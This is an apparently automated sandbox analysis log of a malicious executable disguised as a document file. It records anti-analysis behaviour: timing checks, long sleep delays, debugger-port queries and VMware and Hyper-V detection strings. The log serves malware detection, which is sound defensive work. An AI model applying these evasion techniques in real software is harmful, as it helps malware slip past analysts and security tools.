          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe TID: 1320Thread sleep time: -41500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe TID: 7056Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6120Thread sleep count: 38 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6120Thread sleep time: -76000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6680Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.675357075.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000000.676349696.000000000A9A0000.00000004.00000001.sdmpBinary or memory string: 0ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&`
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.671036141.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.675357075.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.668746120.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.675542552.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000003.00000000.675644781.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exeCode function: 2_2_0040ACD0 LdrLoadDll,2_2_0040ACD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC8CD6 mov eax, dword ptr fs:[00000030h]5_2_04DC8CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB14FB mov eax, dword ptr fs:[00000030h]5_2_04DB14FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76CF0 mov eax, dword ptr fs:[00000030h]5_2_04D76CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76CF0 mov eax, dword ptr fs:[00000030h]5_2_04D76CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76CF0 mov eax, dword ptr fs:[00000030h]5_2_04D76CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0849B mov eax, dword ptr fs:[00000030h]5_2_04D0849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8C450 mov eax, dword ptr fs:[00000030h]5_2_04D8C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8C450 mov eax, dword ptr fs:[00000030h]5_2_04D8C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2A44B mov eax, dword ptr fs:[00000030h]5_2_04D2A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1746D mov eax, dword ptr fs:[00000030h]5_2_04D1746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC740D mov eax, dword ptr fs:[00000030h]5_2_04DC740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC740D mov eax, dword ptr fs:[00000030h]5_2_04DC740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC740D mov eax, dword ptr fs:[00000030h]5_2_04DC740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]5_2_04DB1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]5_2_04D76C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]5_2_04D76C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]5_2_04D76C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]5_2_04D76C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2BC2C mov eax, dword ptr fs:[00000030h]5_2_04D2BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]5_2_04D76DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]5_2_04D76DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]5_2_04D76DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76DC9 mov ecx, dword ptr fs:[00000030h]5_2_04D76DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]5_2_04D76DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]5_2_04D76DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DA8DF1 mov eax, dword ptr fs:[00000030h]5_2_04DA8DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0D5E0 mov eax, dword ptr fs:[00000030h]5_2_04D0D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0D5E0 mov eax, dword ptr fs:[00000030h]5_2_04D0D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DBFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DBFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DBFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]5_2_04DBFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]5_2_04CF2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]5_2_04CF2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]5_2_04CF2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]5_2_04CF2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]5_2_04CF2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2FD9B mov eax, dword ptr fs:[00000030h]5_2_04D2FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2FD9B mov eax, dword ptr fs:[00000030h]5_2_04D2FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]5_2_04D22581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]5_2_04D22581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]5_2_04D22581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]5_2_04D22581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D21DB5 mov eax, dword ptr fs:[00000030h]5_2_04D21DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D21DB5 mov eax, dword ptr fs:[00000030h]5_2_04D21DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D21DB5 mov eax, dword ptr fs:[00000030h]5_2_04D21DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC05AC mov eax, dword ptr fs:[00000030h]5_2_04DC05AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC05AC mov eax, dword ptr fs:[00000030h]5_2_04DC05AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D235A1 mov eax, dword ptr fs:[00000030h]5_2_04D235A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D17D50 mov eax, dword ptr fs:[00000030h]5_2_04D17D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D33D43 mov eax, dword ptr fs:[00000030h]5_2_04D33D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D73540 mov eax, dword ptr fs:[00000030h]5_2_04D73540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1C577 mov eax, dword ptr fs:[00000030h]5_2_04D1C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1C577 mov eax, dword ptr fs:[00000030h]5_2_04D1C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D7A537 mov eax, dword ptr fs:[00000030h]5_2_04D7A537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBE539 mov eax, dword ptr fs:[00000030h]5_2_04DBE539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]5_2_04D03D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC8D34 mov eax, dword ptr fs:[00000030h]5_2_04DC8D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D24D3B mov eax, dword ptr fs:[00000030h]5_2_04D24D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D24D3B mov eax, dword ptr fs:[00000030h]5_2_04D24D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D24D3B mov eax, dword ptr fs:[00000030h]5_2_04D24D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFAD30 mov eax, dword ptr fs:[00000030h]5_2_04CFAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC8ED6 mov eax, dword ptr fs:[00000030h]5_2_04DC8ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D38EC7 mov eax, dword ptr fs:[00000030h]5_2_04D38EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DAFEC0 mov eax, dword ptr fs:[00000030h]5_2_04DAFEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D236CC mov eax, dword ptr fs:[00000030h]5_2_04D236CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D216E0 mov ecx, dword ptr fs:[00000030h]5_2_04D216E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D076E2 mov eax, dword ptr fs:[00000030h]5_2_04D076E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8FE87 mov eax, dword ptr fs:[00000030h]5_2_04D8FE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D746A7 mov eax, dword ptr fs:[00000030h]5_2_04D746A7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DC0EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DC0EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC0EA5 mov eax, dword ptr fs:[00000030h]5_2_04DC0EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]5_2_04D07E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]5_2_04D07E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]5_2_04D07E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]5_2_04D07E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]5_2_04D07E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]5_2_04D07E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBAE44 mov eax, dword ptr fs:[00000030h]5_2_04DBAE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DBAE44 mov eax, dword ptr fs:[00000030h]5_2_04DBAE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]5_2_04D1AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]5_2_04D1AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]5_2_04D1AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]5_2_04D1AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]5_2_04D1AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0766D mov eax, dword ptr fs:[00000030h]5_2_04D0766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2A61C mov eax, dword ptr fs:[00000030h]5_2_04D2A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2A61C mov eax, dword ptr fs:[00000030h]5_2_04D2A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFC600 mov eax, dword ptr fs:[00000030h]5_2_04CFC600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFC600 mov eax, dword ptr fs:[00000030h]5_2_04CFC600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFC600 mov eax, dword ptr fs:[00000030h]5_2_04CFC600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D28E00 mov eax, dword ptr fs:[00000030h]5_2_04D28E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB1608 mov eax, dword ptr fs:[00000030h]5_2_04DB1608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DAFE3F mov eax, dword ptr fs:[00000030h]5_2_04DAFE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CFE620 mov eax, dword ptr fs:[00000030h]5_2_04CFE620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D337F5 mov eax, dword ptr fs:[00000030h]5_2_04D337F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D77794 mov eax, dword ptr fs:[00000030h]5_2_04D77794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D77794 mov eax, dword ptr fs:[00000030h]5_2_04D77794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D77794 mov eax, dword ptr fs:[00000030h]5_2_04D77794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D08794 mov eax, dword ptr fs:[00000030h]5_2_04D08794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0EF40 mov eax, dword ptr fs:[00000030h]5_2_04D0EF40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D0FF60 mov eax, dword ptr fs:[00000030h]5_2_04D0FF60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC8F6A mov eax, dword ptr fs:[00000030h]5_2_04DC8F6A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D1F716 mov eax, dword ptr fs:[00000030h]5_2_04D1F716
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8FF10 mov eax, dword ptr fs:[00000030h]5_2_04D8FF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8FF10 mov eax, dword ptr fs:[00000030h]5_2_04D8FF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC070D mov eax, dword ptr fs:[00000030h]5_2_04DC070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC070D mov eax, dword ptr fs:[00000030h]5_2_04DC070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2A70E mov eax, dword ptr fs:[00000030h]5_2_04D2A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2A70E mov eax, dword ptr fs:[00000030h]5_2_04D2A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF4F2E mov eax, dword ptr fs:[00000030h]5_2_04CF4F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF4F2E mov eax, dword ptr fs:[00000030h]5_2_04CF4F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2E730 mov eax, dword ptr fs:[00000030h]5_2_04D2E730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D8B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8B8D0 mov ecx, dword ptr fs:[00000030h]5_2_04D8B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D8B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D8B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D8B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]5_2_04D8B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF58EC mov eax, dword ptr fs:[00000030h]5_2_04CF58EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF40E1 mov eax, dword ptr fs:[00000030h]5_2_04CF40E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF40E1 mov eax, dword ptr fs:[00000030h]5_2_04CF40E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF40E1 mov eax, dword ptr fs:[00000030h]5_2_04CF40E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04CF9080 mov eax, dword ptr fs:[00000030h]5_2_04CF9080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D73884 mov eax, dword ptr fs:[00000030h]5_2_04D73884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D73884 mov eax, dword ptr fs:[00000030h]5_2_04D73884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2F0BF mov ecx, dword ptr fs:[00000030h]5_2_04D2F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2F0BF mov eax, dword ptr fs:[00000030h]5_2_04D2F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D2F0BF mov eax, dword ptr fs:[00000030h]5_2_04D2F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]5_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]5_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]5_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]5_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]5_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]5_2_04D220A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D390AF mov eax, dword ptr fs:[00000030h]5_2_04D390AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D10050 mov eax, dword ptr fs:[00000030h]5_2_04D10050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D10050 mov eax, dword ptr fs:[00000030h]5_2_04D10050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DB2073 mov eax, dword ptr fs:[00000030h]5_2_04DB2073
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04DC1074 mov eax, dword ptr fs:[00000030h]5_2_04DC1074
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D77016 mov eax, dword ptr fs:[00000030h]5_2_04D77016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04D77016 mov eax, dword ptr fs:[00000030h]5_2_04D77016
